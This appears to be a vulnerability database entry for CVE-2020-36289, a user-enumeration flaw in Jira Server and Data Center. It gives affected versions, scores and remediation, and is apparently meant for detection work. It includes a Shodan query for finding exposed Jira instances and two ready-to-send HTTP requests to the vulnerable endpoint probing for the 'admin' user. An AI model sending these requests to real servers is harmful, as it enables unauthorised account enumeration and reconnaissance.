🔙 목록으로 돌아가기

CVE-2020-36289: Jira Server and Data Center - Information Disclosure

TitleJira Server and Data Center - Information Disclosure
AuthordhiyaneshDk
SeverityMedium
ImpactAn attacker can gain access to sensitive information, potentially leading to further attacks.
RemediationApply the necessary patches or updates provided by Atlassian to fix the vulnerability.
CVSS Score5.3
EPSS Score0.90008
CVE IDCVE-2020-36289
CWE IDCWE-863
Shodan Queryhttp.component:"Atlassian Jira"http.component:"atlassian jira"
Tags cve cve2020 jira atlassian unauth vuln

🔍 Vulnerability Description

Jira Server and Data Center is susceptible to information disclosure. An attacker can enumerate users via the QueryComponentRendererValue!Default.jspa endpoint and thus potentially access sensitive information, modify data, and/or execute unauthorized operations, Affected versions are before version 8.5.13, from version 8.6.0 before 8.13.5, and from version 8.14.0 before 8.15.1.

🌐 HTTP Request

GET /secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-36289.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-36289.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A